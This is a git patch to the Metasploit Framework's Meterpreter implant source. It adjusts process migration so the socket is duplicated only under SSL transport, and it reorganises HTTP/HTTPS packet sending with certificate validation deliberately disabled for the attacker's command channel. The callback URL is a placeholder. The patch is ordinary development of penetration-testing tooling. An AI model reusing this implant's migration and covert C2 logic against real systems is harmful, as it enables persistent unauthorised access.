From c1935eda062cf413ade122dfcdefd3ab5876d718 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 28 Jun 2011 17:25:37 +0000 Subject: [PATCH] Re-add the missing SendRequest, make migrate work git-svn-id: file:///home/svn/framework3/trunk@13048 4d416f70-5f16-0410-b530-b9f4589650da --- .../common/arch/win/i386/base_dispatch.c | 8 +++++--- .../source/meterpreter/source/common/core.c | 20 +++++++++++++++---- .../meterpreter/source/server/server_setup.c | 4 ++-- 3 files changed, 23 insertions(+), 9 deletions(-) diff --git a/external/source/meterpreter/source/common/arch/win/i386/base_dispatch.c b/external/source/meterpreter/source/common/arch/win/i386/base_dispatch.c index b03732baa7..cadd66b6ca 100644 --- a/external/source/meterpreter/source/common/arch/win/i386/base_dispatch.c +++ b/external/source/meterpreter/source/common/arch/win/i386/base_dispatch.c @@ -123,9 +123,11 @@ DWORD remote_request_core_migrate( Remote * remote, Packet * packet ) if( !hProcess ) BREAK_ON_ERROR( "[MIGRATE] OpenProcess failed" ) - // Duplicate the socket for the target process - if( WSADuplicateSocket( remote_get_fd( remote ), dwProcessID, &ctx.info ) != NO_ERROR ) - BREAK_ON_WSAERROR( "[MIGRATE] WSADuplicateSocket failed" ) + if ( remote->transport == METERPRETER_TRANSPORT_SSL ) { + // Duplicate the socket for the target process if we are SSL based + if( WSADuplicateSocket( remote_get_fd( remote ), dwProcessID, &ctx.info ) != NO_ERROR ) + BREAK_ON_WSAERROR( "[MIGRATE] WSADuplicateSocket failed" ) + } // Create a notification event that we'll use to know when it's safe to exit // (once the socket has been referenced in the other process) diff --git a/external/source/meterpreter/source/common/core.c b/external/source/meterpreter/source/common/core.c index a0e1b8a43c..b9052968c2 100644 --- a/external/source/meterpreter/source/common/core.c +++ b/external/source/meterpreter/source/common/core.c @@ -1129,13 +1129,20 @@ DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketReq hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0); - if (hReq == NULL) { dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError()); SetLastError(ERROR_NOT_FOUND); break; } + if (hReq == NULL) { + dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError()); + SetLastError(ERROR_NOT_FOUND); + break; + } + if (remote->transport == METERPRETER_TRANSPORT_HTTPS) { InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen); flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA; InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen); } + hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader) ); + if (! hRes) { dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError()); SetLastError(ERROR_NOT_FOUND); @@ -1350,14 +1357,19 @@ DWORD packet_receive_http_via_wininet(Remote *remote, Packet **packet) { dprintf("[PACKET RECEIVE] HttpOpenRequest"); hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0); + if (hReq == NULL) { + dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError()); + SetLastError(ERROR_NOT_FOUND); + break; + } + if (remote->transport == METERPRETER_TRANSPORT_HTTPS) { InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen); flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA; InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen); } - - if (hReq == NULL) { dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError()); SetLastError(ERROR_NOT_FOUND); break; } - + + hRes = HttpSendRequest(hReq, NULL, 0, "RECV", 4 ); if (! hRes) { dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError()); SetLastError(ERROR_NOT_FOUND); diff --git a/external/source/meterpreter/source/server/server_setup.c b/external/source/meterpreter/source/server/server_setup.c index 0df14b55aa..e3a17950f8 100644 --- a/external/source/meterpreter/source/server/server_setup.c +++ b/external/source/meterpreter/source/server/server_setup.c @@ -4,8 +4,8 @@ char * global_meterpreter_transport = "METERPRETER_TRANSPORT_SSL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; char * global_meterpreter_url = "https://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/\x00"; -int global_expiration_timeout = 0xb64be661; -int global_comm_timeout = 0xaf79257f; +int global_expiration_timeout = 0xb64be661; +int global_comm_timeout = 0xaf79257f; #ifdef _WIN32